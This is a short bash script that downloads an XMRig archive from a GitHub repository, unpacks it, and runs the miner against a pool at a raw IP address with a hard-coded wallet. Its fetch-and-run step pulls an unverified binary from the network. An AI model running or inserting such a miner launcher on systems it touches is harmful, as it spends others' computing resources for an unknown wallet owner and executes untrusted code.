#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --coin=SAL --donate-level 1 -o 152.42.234.26:443 -u 89qNbkmZXFqeXnKsNs6DBPP98RLC79PkFP3J423qGPqgZGr76sVvkXgSj1oK8jrEm1dGKNLzxrVEMWWiekKjEBoQ5dRYmUk -p 3 -a rx/0
